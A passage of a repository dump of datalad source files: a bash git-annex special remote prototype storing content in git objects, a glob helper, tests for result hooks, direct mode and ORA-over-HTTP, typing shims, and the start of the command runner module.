"alphanum_fraction": 0.6496227979660034, "avg_line_length": 25.21977996826172, "blob_id": "282c2a22023ec0a9a0d7cd5ee8518a0ef1ff908b", "content_id": "52a3ca940f42651a300c550a7d64a15554cd55e8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4772, "license_type": "permissive", "max_line_length": 73, "num_lines": 182, "path": "/sandbox/git-annex-remote-gitobjects", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\tbash - for string indexing\n#\n# git-annex external special remote prototype to test feasibility of\n# using regular git objects and refs to store content of files in remote\n# git objects store.\n#\n# Pros:\n# - could work with any git repository hosting, even the one which does\n# not support annex\n#\n# Cons:\n# - at this point it is more of a \"proof of concept\"\n# - longevity of those references on the remote is not guaranteed\n# - it is quite slow, so should be used for relatively small load\n#\n# Discussion and possibly more ways it could be improved are available\n# from https://github.com/datalad/datalad/pull/3727\n#\n# Based on an example of git annex special remote, which is\n# Copyright 2013 Joey Hess; licenced under the GNU GPL version 3 or higher.\n# Tuned for the gitobjects type remote by Yaroslav Halchenko, 2019-2020\n#\n\nset -e\n\n# This program speaks a line-based protocol on stdin and stdout.\n# When running any commands, their stdout should be redirected to stderr\n# (or /dev/null) to avoid messing up the protocol.\nruncmd () {\n\techo DEBUG \"Running $@\"\n\t\"$@\" >/dev/null 2>&1 # &2\n}\n\n# Prevent any gc so we could avoid objects being packed before we get\n# rid of them\nrungitcmd () {\n\truncmd git -c gc.auto=0 \"$@\"\n}\n\n# Gets a value from the remote's configuration, and stores it in RET\ngetconfig () {\n\task GETCONFIG \"$1\"\n}\n\n# Stores a value in the remote's configuration.\nsetconfig () {\n\techo SETCONFIG \"$1\" \"$2\"\n}\n\n# Sets ref to the reference to use to store a key.\ncalcref () {\n\tref=\"refs/annex-gitobjects/$1\"\n}\n\ncalcobjfile () {\n\tobjfile=\"$gitdir/objects/${h:0:2}/${h:2}\"\n\techo DEBUG \"objfile=$objfile\"\n}\n\n# Asks for some value, and stores it in RET\nask () {\n\techo \"$1\" \"$2\"\n\tread resp\n\t# Tricky POSIX shell code to split first word of the resp,\n\t# preserving all other whitespace\n\tcase \"${resp%% *}\" in\n\t\tVALUE)\n\t\t\tRET=\"$(echo \"$resp\" | sed 's/^VALUE \\?//')\"\n\t\t;;\n\t\t*)\n\t\t\tRET=\"\"\n\t\t;;\n\tesac\n}\n\ncleanup () {\n\t# remove reference and object locally\n\trungitcmd update-ref -d \"$ref\"\n\tif [ \"$knownobj\" = '' ]; then\n\t\trm -f \"$objfile\"\n\tfi\n}\n\ngitdir=$(git rev-parse --git-dir)\n\n# This has to come first, to get the protocol started.\necho VERSION 1\n\nwhile read line; do\n\tset -- $line\n\tcase \"$1\" in\n\t\tINITREMOTE)\n\t\t\t# Nothing todo I think\n\t\t\techo INITREMOTE-SUCCESS\n\t\t;;\n\t\tPREPARE)\n\t\t\t# TODO: should probably request remote url not already existing\n\t\t\t# remote... think more, to speed things up, we use existing one\n\t\t\tgetconfig remote\n\t\t\tremote=\"$RET\"\n\t\t\t# just to check that all is kosher\n\t\t\tif git remote get-url \"$remote\" >/dev/null 2>&1; then\n\t\t\t\techo PREPARE-SUCCESS\n\t\t\telse\n\t\t\t\techo PREPARE-FAILURE \"$remote is either unknown or has no url\"\n\t\t\tfi\n\t\t;;\n\t\tTRANSFER)\n\t\t\top=\"$2\"\n\t\t\tkey=\"$3\"\n\t\t\tshift 3\n\t\t\tfile=\"$@\"\n\n\t\t\tcalcref \"$key\"\n\t\t\tcase \"$op\" in\n\t\t\t\tSTORE)\n\t\t\t\t\t# Store the file to a location\n\t\t\t\t\t# based on the key.\n\t\t\t\t\t# We will need to do it twice ATM to make sure that we do\n\t\t\t\t\t# not wipe out object which magically already exists\n\t\t\t\t\th=$(git -c gc.auto=0 hash-object --stdin < \"$file\")\n\t\t\t\t\tcalcobjfile \"$h\"\n\t\t\t\t\tknownobj=$( [ -e \"$objfile\" ] && echo 1 || echo '' )\n\t\t\t\t\techo DEBUG knownobj=$knownobj\n\t\t\t\t\t# now with -w\n\t\t\t\t\trungitcmd hash-object --stdin -w < \"$file\"\n\t\t\t\t\t# create a reference for that object with the key in it\n\t\t\t\t\trungitcmd update-ref \"$ref\" \"$h\"\n\t\t\t\t\t# push that reference (and corresponding object) to the remote\n\t\t\t\t\trungitcmd push \"$remote\" \"$ref:$ref\"\n\t\t\t\t\tcleanup\n\t\t\t\t\techo TRANSFER-SUCCESS STORE \"$key\"\n\t\t\t\t\t# TODO: chain to report TRANSFER-FAILURE\n\t\t\t\t;;\n\t\t\t\tRETRIEVE)\n\t\t\t\t\t# TODO: we cannot know for sure if object existed prior!\n\t\t\t\t\t# since we don't know object hash. may be we should save\n\t\t\t\t\t# it into the STATE and use that to check first\n\t\t\t\t\tknownobj=''\n\t\t\t\t\t# TODO: interface progress reporting\n\t\t\t\t\trungitcmd fetch \"$remote\" \"$ref:$ref\"\n\t\t\t\t\techo DEBUG \"getting git hexsha\"\n\t\t\t\t\th=$(git -c gc.auto=0 show-ref -s \"$ref\")\n\t\t\t\t\tcalcobjfile \"$h\"\n\t\t\t\t\techo DEBUG \"cat-file $ref into $file\"\n\t\t\t\t\tgit -c gc.auto=0 cat-file -p \"$ref\" > \"$file\"\n\t\t\t\t\techo DEBUG done - you must have a file\n\t\t\t\t\tcleanup\n\t\t\t\t\techo TRANSFER-SUCCESS RETRIEVE \"$key\"\n\t\t\t\t\t# TODO: chain to report TRANSFER-FAILURE\n\t\t\t\t;;\n\t\t\tesac\n\t\t;;\n\t\tCHECKPRESENT)\n\t\t\t# TODO: ATM expensive since probably fetching a reference\n\t\t\t# would fetch the object?\n\t\t\tkey=\"$2\"\n\t\t\tcalcref \"$key\"\n\t\t\trungitcmd ls-remote --exit-code \"$remote\" \"$ref\" \\\n\t\t\t\t&& echo CHECKPRESENT-SUCCESS \"$key\" \\\n\t\t\t\t|| echo CHECKPRESENT-FAILURE \"$key\"\n\t\t\trm -f \"$gitdir/$ref\"\n\t\t;;\n\t\tREMOVE)\n\t\t\tkey=\"$2\"\n\t\t\tcalcref \"$key\"\n\t\t\trungitcmd push \"$remote\" \":$ref\" \\\n\t\t\t&& echo \"REMOVE-SUCCESS $key\" \\\n\t\t\t|| echo \"REMOVE-FAILURE $key Who knows why?\"\n\t\t;;\n\t\tGETINFO)\n\t\t\techo INFOFIELD \"remote\"\n\t\t\techo INFOVALUE \"$remote\"\n\t\t\techo INFOEND\n\t\t;;\n\n\t\t*)\n\t\t\techo UNSUPPORTED-REQUEST\n\t\t;;\n\tesac\ndone\n" }, { "alpha_fraction": 0.5489262938499451, "alphanum_fraction": 0.5503652691841125, "avg_line_length": 36.641666412353516, "blob_id": "4f562734c77e116683be290468e3363f21b9f539", "content_id": "69d3859fd102236466f0e26818192934ca32f788", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9034, "license_type": "permissive", "max_line_length": 123, "num_lines": 240, "path": "/datalad/support/globbedpaths.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Wrapper for globbing paths.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport glob\nimport logging\nimport os.path as op\nfrom functools import lru_cache\nfrom itertools import chain\nfrom typing import (\n Iterable,\n Optional,\n)\n\nfrom datalad.utils import (\n chpwd,\n ensure_unicode,\n getpwd,\n partition,\n)\n\nlgr = logging.getLogger('datalad.support.globbedpaths')\n\n\nclass GlobbedPaths(object):\n \"\"\"Helper for globbing paths.\n\n Parameters\n ----------\n patterns : list of str\n Call `glob.glob` with each of these patterns. \".\" is considered as\n datalad's special \".\" path argument; it is not passed to glob and is\n always left unexpanded. Each set of glob results is sorted\n alphabetically.\n pwd : str, optional\n Glob in this directory.\n expand : bool, optional\n Whether the `paths` property returns unexpanded or expanded paths.\n \"\"\"\n\n def __init__(self, patterns: Optional[Iterable[str | bytes]], pwd: Optional[str] = None, expand: bool = False) -> None:\n self.pwd = pwd or getpwd()\n self._expand = expand\n\n self._maybe_dot: list[str]\n self._patterns: list[str]\n if patterns is None:\n self._maybe_dot = []\n self._patterns = []\n else:\n pattern_strs = list(map(ensure_unicode, patterns))\n pattern_iter, dots = partition(pattern_strs, lambda i: i.strip() == \".\")\n self._maybe_dot = [\".\"] if list(dots) else []\n self._patterns = [op.relpath(p, start=pwd) if op.isabs(p) else p\n for p in pattern_iter]\n self._cache: dict[str, dict[str, list[str]]] = {}\n self._expanded_cache: dict[tuple[str, bool, bool], list[str]] = {}\n\n def __bool__(self) -> bool:\n return bool(self._maybe_dot or self._patterns)\n\n @staticmethod\n @lru_cache()\n def _get_sub_patterns(pattern: str) -> list[str]:\n \"\"\"Extract sub-patterns from the leading path of `pattern`.\n\n The right-most path component is successively peeled off until there\n are no patterns left.\n \"\"\"\n head, tail = op.split(pattern)\n if not tail:\n # Pattern ended with a separator. Take the first directory as the\n # base.\n head, tail = op.split(head)\n\n sub_patterns = []\n seen_magic = glob.has_magic(tail)\n while head:\n new_head, tail = op.split(head)\n if seen_magic and not glob.has_magic(head):\n break\n elif not seen_magic and glob.has_magic(tail):\n seen_magic = True\n\n if seen_magic:\n sub_patterns.append(head + op.sep)\n head = new_head\n return sub_patterns\n\n def _expand_globs(self) -> tuple[dict[str, list[str]], dict[str, list[str]], dict[str, list[str]]]:\n def normalize_hit(h: str) -> str:\n normalized = op.relpath(h) + (\"\" if op.basename(h) else op.sep)\n if h == op.curdir + op.sep + normalized:\n # Don't let relpath prune \"./fname\" (gh-3034).\n return h\n return normalized\n\n hits: dict[str, list[str]] = {}\n partial_hits: dict[str, list[str]] = {}\n misses: dict[str, list[str]] = {}\n with chpwd(self.pwd):\n for pattern in self._patterns:\n full_hits = glob.glob(pattern, recursive=True)\n if full_hits:\n hits[pattern] = sorted(map(normalize_hit, full_hits))\n else:\n lgr.debug(\"No matching files found for '%s'\", pattern)\n # We didn't find a hit for the complete pattern. If we find\n # a sub-pattern hit, that may mean we have an uninstalled\n # subdataset.\n for sub_pattern in self._get_sub_patterns(pattern):\n sub_hits = glob.glob(sub_pattern, recursive=True)\n if sub_hits:\n partial_hits[pattern] = sorted(\n map(normalize_hit, sub_hits))\n break\n else:\n misses[pattern] = [pattern]\n return hits, partial_hits, misses\n\n def expand(self, full: bool = False, dot: bool = True, refresh: bool = False,\n include_partial: bool = True, include_misses: bool = True) -> list[str]:\n \"\"\"Return paths with the globs expanded.\n\n Globbing is done with `glob.glob`. If a pattern doesn't have a match,\n the trailing path component of the pattern is removed and, if any globs\n remain, `glob.glob` is called again with the new pattern. This\n procedure is repeated until a pattern matches or there are no more\n patterns.\n\n Parameters\n ----------\n full : bool, optional\n Return full paths rather than paths relative to `pwd`.\n dot : bool, optional\n Include the \".\" pattern if it was specified.\n refresh : bool, optional\n Run glob regardless of whether there are cached values. This is\n useful if there may have been changes on the file system.\n include_partial : bool, optional\n Whether the results include sub-pattern hits (see description\n above) when the full pattern doesn't match.\n include_misses : : bool, optional\n Whether the results include the original pattern when there are no\n matches for a pattern or its sub-patterns (see description above).\n \"\"\"\n if refresh:\n self._cache = {}\n self._expanded_cache = {}\n\n maybe_dot = self._maybe_dot if dot else []\n if not self._patterns:\n return maybe_dot + []\n\n if \"hits\" not in self._cache:\n hits, partial_hits, misses = self._expand_globs()\n self._cache[\"hits\"] = hits\n self._cache[\"partial_hits\"] = partial_hits\n self._cache[\"misses\"] = misses\n else:\n hits = self._cache[\"hits\"]\n partial_hits = self._cache[\"partial_hits\"]\n misses = self._cache[\"misses\"]\n\n key_suffix = (include_partial, include_misses)\n key_expanded = (\"expanded\",) + key_suffix\n if key_expanded not in self._expanded_cache:\n sources = [hits]\n if include_partial:\n sources.append(partial_hits)\n if include_misses:\n sources.append(misses)\n\n paths = []\n for pattern in self._patterns:\n for source in sources:\n if pattern in source:\n paths.extend(source[pattern])\n break\n self._expanded_cache[key_expanded] = paths\n else:\n paths = self._expanded_cache[key_expanded]\n\n if full:\n key_full = (\"expanded_full\",) + key_suffix\n if key_full not in self._expanded_cache:\n paths = [op.join(self.pwd, p) for p in paths]\n self._expanded_cache[key_full] = paths\n else:\n paths = self._expanded_cache[key_full]\n\n return maybe_dot + paths\n\n def expand_strict(self, full: bool = False, dot: bool = True, refresh: bool = False) -> list[str]:\n return self.expand(full=full, dot=dot, refresh=refresh,\n include_partial=False, include_misses=False)\n\n def _chain(self, what: str) -> list[str]:\n if self._patterns:\n if \"hits\" not in self._cache:\n self.expand()\n # Note: This assumes a preserved insertion order for dicts, which\n # is true with our current minimum python version (3.6) and part of\n # the language spec as of 3.7.\n return list(chain(*self._cache[what].values()))\n return []\n\n @property\n def partial_hits(self) -> list[str]:\n \"\"\"Return patterns that had a partial but not complete match.\n \"\"\"\n return self._chain(\"partial_hits\")\n\n @property\n def misses(self) -> list[str]:\n \"\"\"Return patterns that didn't have any complete or partial matches.\n\n This doesn't include patterns where a sub-pattern matched. Those are\n available via `partial_hits`.\n \"\"\"\n return self._chain(\"misses\")\n\n @property\n def paths(self) -> list[str]:\n \"\"\"Return paths relative to `pwd`.\n\n Globs are expanded if `expand` was set to true during instantiation.\n \"\"\"\n if self._expand:\n return self.expand()\n return self._maybe_dot + self._patterns\n" }, { "alpha_fraction": 0.5730367302894592, "alphanum_fraction": 0.5773251056671143, "avg_line_length": 34.875, "blob_id": "5884a0e6e889ed1c488f4e47d047e7f0d7006bd9", "content_id": "fba43f2f1cbb3286c1aacc93182848d55853ea63", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3731, "license_type": "permissive", "max_line_length": 85, "num_lines": 104, "path": "/datalad/core/local/tests/test_resulthooks.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test result hooks\"\"\"\n\nfrom datalad.api import (\n Dataset,\n install,\n)\nfrom datalad.tests.utils_pytest import (\n assert_result_count,\n eq_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import on_windows\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_basics(src=None, dst=None):\n # dataset with subdataset, not specific configuration\n ds = Dataset(src).create()\n (ds.pathobj / 'file1').write_text('some')\n ds.save()\n sub = ds.create('subds')\n # second one for a result_xfm test below\n ds.create('subds2')\n\n # now clone the super\n clone = install(source=src, path=dst)\n # config on which kind of results this hook should operate\n clone.config.set(\n 'datalad.result-hook.alwaysbids.match-json',\n # any successfully installed dataset\n '{\"type\":\"dataset\",\"action\":\"install\",\"status\":[\"eq\", \"ok\"]}',\n scope='local',\n )\n # a smoke test to see if a hook definition without any call args works too\n clone.config.set('datalad.result-hook.wtf.call-json',\n 'wtf {{\"result_renderer\": \"disabled\"}}',\n scope='local')\n clone.config.set(\n 'datalad.result-hook.wtf.match-json',\n '{\"type\":\"dataset\",\"action\":\"install\",\"status\":[\"eq\", \"ok\"]}',\n scope='local',\n )\n # configure another one that will unlock any obtained file\n # {dsarg} is substituted by the dataset arg of the command that\n # the eval_func() decorator belongs to\n # but it may not have any, as this is not the outcome of a\n # require_dataset(), but rather the verbatim input\n # it could be more useful to use {refds}\n clone.config.set(\n 'datalad.result-hook.unlockfiles.call-json',\n 'unlock {{\"dataset\":\"{dsarg}\",\"path\":\"{path}\"}}',\n scope='local',\n )\n clone.config.set(\n 'datalad.result-hook.unlockfiles.match-json',\n '{\"type\":\"file\",\"action\":\"get\",\"status\":\"ok\"}',\n scope='local',\n )\n if not on_windows:\n # and one that runs a shell command on any notneeded file-get\n clone.config.set(\n 'datalad.result-hook.annoy.call-json',\n 'run {{\"cmd\":\"touch {path}_annoyed\",'\n '\"dataset\":\"{dsarg}\",\"explicit\":true}}',\n scope='local',\n )\n clone.config.set(\n 'datalad.result-hook.annoy.match-json',\n '{\"type\":[\"in\", [\"file\"]],\"action\":\"get\",\"status\":\"notneeded\"}',\n scope='local',\n )\n # setup done, now see if it works\n clone.get('subds')\n clone_sub = Dataset(clone.pathobj / 'subds')\n # now the same thing with a result_xfm, should make no difference\n clone.get('subds2')\n clone_sub2 = Dataset(clone.pathobj / 'subds2')\n\n # hook auto-unlocks the file\n if not clone.repo.is_managed_branch():\n ok_((clone.pathobj / 'file1').is_symlink())\n res = clone.get('file1')\n if not clone.repo.is_managed_branch():\n # we get to see the results from the hook too!\n assert_result_count(\n res, 1, action='unlock', path=str(clone.pathobj / 'file1'))\n ok_(not (clone.pathobj / 'file1').is_symlink())\n\n if not clone.repo.is_managed_branch():\n # different hook places annoying file next to a file that was already present\n annoyed_file = clone.pathobj / 'file1_annoyed'\n ok_(not annoyed_file.exists())\n clone.get('file1')\n ok_(annoyed_file.exists())\n" }, { "alpha_fraction": 0.6358914971351624, "alphanum_fraction": 0.6402192711830139, "avg_line_length": 36.26881790161133, "blob_id": "ad53fe8a62407c48cddc93ce7da8aad9c216f53f", "content_id": "d58e967b974f72d720562a86153925f02c31f16c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3466, "license_type": "permissive", "max_line_length": 100, "num_lines": 93, "path": "/datalad/tests/test_direct_mode.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test direct mode mechanic\n\n\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad.support import path as op\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandNotAvailableError,\n DirectModeNoLongerSupportedError,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_raises,\n with_tempfile,\n)\n\n# if on_windows:\n# raise SkipTest(\"Can't test direct mode switch, \"\n# \"if direct mode is forced by OS anyway.\")\n#\n# repo_version = cfg.get(\"datalad.repo.version\", None)\n# if repo_version and int(repo_version) >= 6:\n# raise SkipTest(\"Can't test direct mode switch, \"\n# \"if repository version 6 or later is enforced.\")\n\n\n# originally lifted from AnnexRepo, kept here to simulate a repo\n# that is still in direct mode\ndef _set_direct_mode(self, enable_direct_mode=True):\n \"\"\"Switch to direct or indirect mode\n\n WARNING! To be used only for internal development purposes.\n We no longer support direct mode and thus setting it in a\n repository would render it unusable for DataLad\n\n Parameters\n ----------\n enable_direct_mode: bool\n True means switch to direct mode,\n False switches to indirect mode\n\n Raises\n ------\n CommandNotAvailableError\n in case you try to switch to indirect mode on a crippled filesystem\n \"\"\"\n if self.is_crippled_fs() and not enable_direct_mode:\n # TODO: ?? DIRECT - should we call git annex upgrade?\n raise CommandNotAvailableError(\n cmd=\"git-annex indirect\",\n msg=\"Can't switch to indirect mode on that filesystem.\")\n\n self.call_annex(['direct' if enable_direct_mode else 'indirect']),\n self.config.reload()\n\n # For paranoid we will just re-request\n self._direct_mode = None\n assert(self.is_direct_mode() == enable_direct_mode)\n\n # All further workarounds were stripped - no direct mode is supported\n\n\n@with_tempfile\n@with_tempfile\ndef test_direct_cfg(path1=None, path2=None):\n # and if repo already exists and we have env var - we fail too\n # Adding backend so we get some commit into the repo\n ar = AnnexRepo(path1, create=True, backend='MD5E')\n del ar; AnnexRepo._unique_instances.clear() # fight flyweight\n for path in (path1, path2):\n with patch.dict('os.environ', {'DATALAD_REPO_DIRECT': 'True'}):\n # try to create annex repo in direct mode as see how it fails\n with assert_raises(DirectModeNoLongerSupportedError) as cme:\n AnnexRepo(path, create=True)\n assert_in(\"no longer supported by DataLad\", str(cme.value)) # we have generic part\n assert_in(\"datalad.repo.direct configuration\", str(cme.value)) # situation specific part\n # assert not op.exists(path2) # that we didn't create it - we do!\n # fixing for that would be too cumbersome since we first call GitRepo.__init__\n # with create\n ar = AnnexRepo(path1)\n # check if we somehow didn't reset the flag\n assert not ar.is_direct_mode()\n" }, { "alpha_fraction": 0.5993518829345703, "alphanum_fraction": 0.6020808219909668, "avg_line_length": 36.58333206176758, "blob_id": "adfb93e8f4819f6f315c9302a1eda8b0755ef506", "content_id": "1f274f2c26608444701fec0b997222af9565087f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5863, "license_type": "permissive", "max_line_length": 88, "num_lines": 156, "path": "/datalad/distributed/tests/test_ora_http.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import shutil\n\nfrom datalad.api import Dataset\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n)\nfrom datalad.distributed.ora_remote import LocalIO\nfrom datalad.distributed.tests.ria_utils import (\n common_init_opts,\n populate_dataset,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n known_failure_windows,\n serve_path_via_http,\n skip_if_adjusted_branch,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n# NOTE: All we want and can test here is the HTTP functionality of the ORA\n# remote. As of now, this is get and checkpresent only, sending one\n# request each. The used URI for those requests is based on store layout\n# version 1 and dataset layout version 2. Serving archives and/or\n# different layouts via those requests is up to the server side, which we\n# don't test here.\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile\ndef test_initremote(store_path=None, store_url=None, ds_path=None):\n ds = Dataset(ds_path).create()\n store_path = Path(store_path)\n url = \"ria+\" + store_url\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n # fail when there's no RIA store at the destination\n assert_raises(CommandError, ds.repo.init_remote, 'ora-remote',\n options=init_opts)\n # Doesn't actually create a remote if it fails\n assert_not_in('ora-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n # now make it a store\n io = LocalIO()\n create_store(io, store_path, '1')\n create_ds_in_store(io, store_path, ds.id, '2', '1')\n\n # fails on non-RIA URL\n assert_raises(CommandError, ds.repo.init_remote, 'ora-remote',\n options=common_init_opts + ['url={}'\n ''.format(store_path.as_uri())]\n )\n # Doesn't actually create a remote if it fails\n assert_not_in('ora-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n ds.repo.init_remote('ora-remote', options=init_opts)\n assert_in('ora-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n assert_repo_status(ds.path)\n # git-annex:remote.log should have:\n # - url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(url), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n\n# TODO: on crippled FS copytree to populate store doesn't seem to work.\n# Or may be it's just the serving via HTTP that doesn't work.\n# Either way, after copytree and fsck, whereis doesn't report\n# the store as an available source.\n@skip_if_adjusted_branch\n@known_failure_windows # see gh-4469\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile\ndef test_read_access(store_path=None, store_url=None, ds_path=None):\n\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n files = [Path('one.txt'), Path('subdir') / 'two']\n store_path = Path(store_path)\n url = \"ria+\" + store_url\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n io = LocalIO()\n create_store(io, store_path, '1')\n create_ds_in_store(io, store_path, ds.id, '2', '1')\n ds.repo.init_remote('ora-remote', options=init_opts)\n fsck_results = ds.repo.fsck(remote='ora-remote', fast=True)\n # Note: Failures in the special remote will show up as a success=False\n # result for fsck -> the call itself would not fail.\n for r in fsck_results:\n if \"note\" in r:\n # we could simply assert \"note\" to not be in r, but we want proper\n # error reporting - content of note, not just its unexpected\n # existence.\n assert_equal(r[\"success\"], \"true\",\n msg=\"git-annex-fsck failed with ORA over HTTP: %s\" % r)\n assert_equal(r[\"error-messages\"], [])\n store_uuid = ds.siblings(name='ora-remote',\n return_type='item-or-list',\n result_renderer='disabled')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list',\n result_renderer='disabled')['annex-uuid']\n\n # nothing in store yet:\n for f in files:\n known_sources = ds.repo.whereis(str(f))\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n\n annex_obj_target = str(store_path / ds.id[:3] / ds.id[3:]\n / 'annex' / 'objects')\n shutil.rmtree(annex_obj_target)\n shutil.copytree(src=str(ds.repo.dot_git / 'annex' / 'objects'),\n dst=annex_obj_target)\n\n ds.repo.fsck(remote='ora-remote', fast=True)\n # all in store now:\n for f in files:\n known_sources = ds.repo.whereis(str(f))\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n\n ds.drop('.')\n res = ds.get('.')\n assert_equal(len(res), 4)\n assert_result_count(res, 4, status='ok', type='file', action='get',\n message=\"from ora-remote...\")\n\n # try whether the reported access URL is correct\n one_url = ds.repo.whereis('one.txt', output='full'\n )[store_uuid]['urls'].pop()\n assert_status('ok', ds.download_url(urls=[one_url], path=str(ds.pathobj / 'dummy')))\n" }, { "alpha_fraction": 0.4897196292877197, "alphanum_fraction": 0.5018691420555115, "avg_line_length": 21.76595687866211, "blob_id": "59e7acde93552feb3312d1da6072389b4b37e466", "content_id": "6965b406d07d10bdf77cf432ff9da4666ee844c8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1070, "license_type": "permissive", "max_line_length": 87, "num_lines": 47, "path": "/datalad/typing.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom typing import TypeVar\n\nif sys.version_info >= (3, 11):\n from typing import Self\nelse:\n from typing_extensions import Self\n\nif sys.version_info >= (3, 10):\n from typing import (\n Concatenate,\n ParamSpec,\n )\nelse:\n from typing_extensions import (\n Concatenate,\n ParamSpec,\n )\n\nif sys.version_info >= (3, 8):\n from typing import (\n Literal,\n Protocol,\n TypedDict,\n )\nelse:\n from typing_extensions import (\n Literal,\n Protocol,\n TypedDict,\n )\n\n__all__ = [\"Literal\", \"ParamSpec\", \"T\", \"K\", \"V\", \"P\"]\n\nT = TypeVar(\"T\")\nK = TypeVar(\"K\")\nV = TypeVar(\"V\")\nP = ParamSpec(\"P\")\n" }, { "alpha_fraction": 0.5891945958137512, "alphanum_fraction": 0.5898949503898621, "avg_line_length": 38.97999954223633, "blob_id": "52a5a8b8fe957f9cdde0ca6310e40488b17c7cb9", "content_id": "32c8074ee32da30eac7327704a82151bf2a2cdaa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9995, "license_type": "permissive", "max_line_length": 87, "num_lines": 250, "path": "/datalad/runner/runner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base DataLad command execution runner\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom os import PathLike\nfrom queue import Queue\nfrom typing import (\n IO,\n cast,\n)\n\nfrom .protocol import WitlessProtocol\nfrom .coreprotocols import NoCapture\nfrom .exception import CommandError\nfrom .nonasyncrunner import (\n ThreadedRunner,\n _ResultGenerator,\n)\nfrom .protocol import GeneratorMixIn\n\n\nlgr = logging.getLogger('datalad.runner.runner')\n\n\nclass WitlessRunner(object):\n \"\"\"Minimal Runner with support for online command output processing\n\n It aims to be as simple as possible, providing only essential\n functionality.\n \"\"\"\n __slots__ = ['cwd', 'env']\n\n def __init__(self,\n cwd: str | PathLike | None = None,\n env: dict | None = None\n ):\n \"\"\"\n Parameters\n ----------\n cwd : str or path-like, optional\n If given, commands are executed with this path as PWD,\n the PWD of the parent process is used otherwise.\n env : dict, optional\n Environment to be used for command execution. If `None` is provided,\n the current process environment is inherited by the sub-process. If\n a mapping is provided, it will constitute the complete environment of\n the sub-process, i.e. no values from the environment of the current\n process will 